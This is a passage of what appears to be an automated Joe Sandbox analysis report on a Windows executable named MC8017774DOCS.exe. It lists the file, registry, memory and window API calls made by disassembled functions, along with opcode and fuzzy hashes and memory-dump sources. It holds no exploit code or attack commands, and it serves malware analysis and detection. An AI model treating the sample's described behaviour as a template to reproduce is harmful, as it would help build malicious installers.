                                                                                                                                                    • Opcode ID: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                    • Instruction ID: f8cbec149f8048a337a195de8e089d72e19c2715f3a6386891d9cbb614a09016
                                                                                                                                                    • Opcode Fuzzy Hash: c77725e8978f6dbc308834741f2b8f5018f4a929a6ea22720db737a721ff7b5c
                                                                                                                                                    • Instruction Fuzzy Hash: D3E08C326042116AD7119A709E4497B66AC9A89740307883EFD46F2181EB3A9C31AAAD
                                                                                                                                                    Function 00405D8D Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,00402F1D,C:\Users\user\Desktop\MC8017774DOCS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D91
                                                                                                                                                    • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DB3
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$AttributesCreate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 415043291-0
                                                                                                                                                    • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                    • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                                                                                                                    • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                                                                                                                    • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                                                                                                                    Function 00405D68 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,0040596D,?,?,00000000,00405B43,?,?,?,?), ref: 00405D6D
                                                                                                                                                    • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D81
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                    • Instruction ID: 56b75d8f9ca2641e27e40e0bc5846bc1deeaaca66535f557d4a9eea11918b9db
                                                                                                                                                    • Opcode Fuzzy Hash: abb1859115452ae29e15aed1e23886b2a100c548e8c413493f0cbd9ae974b18a
                                                                                                                                                    • Instruction Fuzzy Hash: 39D01272504421AFC2512738EF0C89BBF95DF543717128B35FEE9A22F0CB314C568A98
                                                                                                                                                    Function 0040584B Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateDirectoryW.KERNELBASE(?,00000000,0040335F,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76233420,004035B6,?,00000006,00000008,0000000A), ref: 00405851
                                                                                                                                                    • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 0040585F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1375471231-0
                                                                                                                                                    • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                    • Instruction ID: 569726fefb5a692a208b00f3c4627a0038051db83374957b12f20e82e1ac62f2
                                                                                                                                                    • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                                                                                                                    • Instruction Fuzzy Hash: 97C08C71211501DAC7002F318F08B073A50AB20340F15883DA64AE00E0CA308024D92D
                                                                                                                                                    Function 00406132 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CF2,00000000,?,?), ref: 0040615B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Create
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2289755597-0
                                                                                                                                                    • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                    • Instruction ID: 5f0451bdd463ed866e2305ac1dfee878cc5b4d333075ebda4e05e47d22d2a603
                                                                                                                                                    • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                                                                                                                    • Instruction Fuzzy Hash: 6BE0E672110109BEDF099F50DD0AD7B371DE704304F01452EFA06D5051E6B5AD305674
                                                                                                                                                    Function 00405E10 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403321,00000000,00000000,00403168,?,00000004,00000000,00000000,00000000), ref: 00405E24
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileRead
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2738559852-0
                                                                                                                                                    • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                    • Instruction ID: 994fac52afecd872c6575aa209eb3fbbfd601c2a51b89c6ee9ed5d101180f43c
                                                                                                                                                    • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                                                                                                                    • Instruction Fuzzy Hash: 93E08C3220525AABCF109F51CC04EEB3B6CEB04360F000832FD98E2040D230EA219BE4
                                                                                                                                                    Function 00405E3F Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032D7,000000FF,0078B6D8,?,0078B6D8,?,?,00000004,00000000), ref: 00405E53
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3934441357-0
                                                                                                                                                    • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                    • Instruction ID: 720248cc98aac2988b2abacb793a2dea5f933c74ab6652834825bf215bbdf934
                                                                                                                                                    • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                                                                                                                    • Instruction Fuzzy Hash: 72E08C3220025AABCF109F60DC00AEB3B6CFB007E0F048432F951E3040D230EA208FE4
                                                                                                                                                    Function 6E9B2997 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • VirtualProtect.KERNELBASE(6E9B405C,00000004,00000040,6E9B404C), ref: 6E9B29B5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2560495387.000000006E9B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 6E9B0000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2560404950.000000006E9B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560576199.000000006E9B3000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2560603132.000000006E9B5000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_6e9b0000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ProtectVirtual
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 544645111-0
                                                                                                                                                    • Opcode ID: f51089a927739ee14f809b9afe7efb43db5c52e4e5d1e1b89f963fa4639d743b
                                                                                                                                                    • Instruction ID: 6815c4b3cfd69bebb5255feb492b5917dcdc54d2a4cd20089854c40591412a88
                                                                                                                                                    • Opcode Fuzzy Hash: f51089a927739ee14f809b9afe7efb43db5c52e4e5d1e1b89f963fa4639d743b
                                                                                                                                                    • Instruction Fuzzy Hash: 33F092F1D1CA80DECB50CFA884847173BF0EF5A304B11452AE1A8DA240F374884AEF11
                                                                                                                                                    Function 00406104 Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F00,?,?,00406192,007A0F00,00000000,?,?,Call,?), ref: 00406128
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Open
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 71445658-0
                                                                                                                                                    • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                    • Instruction ID: 68c61e8d1810f1ea9cab55705828a401d3ebcdae1eadef42580152fd7570d6fd
                                                                                                                                                    • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                                                                                                                    • Instruction Fuzzy Hash: 4BD0123204020EBBDF11AE909D01FAB3B1DEB08350F014826FE06A80A2D776D530AB54
                                                                                                                                                    Function 004015A3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
                                                                                                                                                    • Instruction ID: c073ba0ee5163cb04706f99935c2f3c73a5a9b1a05bee32f9da8622fc5c815d0
                                                                                                                                                    • Opcode Fuzzy Hash: 99b224af46cdf8f89f3b15e0f2cf225334fcfe2526a8f22c9c92f8a7263cf905
                                                                                                                                                    • Instruction Fuzzy Hash: 68D01272B04100D7DB50DBE4AF4899D73A4AB84369B348577E102F11D0DAB9D9515B29
                                                                                                                                                    Function 00404243 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(00000028,?,00000001,0040406E), ref: 00404251
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000000.00000002.2521649851.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000000.00000002.2521630275.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521669536.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2521694302.00000000007C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    • Associated: 00000000.00000002.2522088503.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_MC8017774DOCS.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                    • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                                                                                                                    • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                                                                                                                    • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
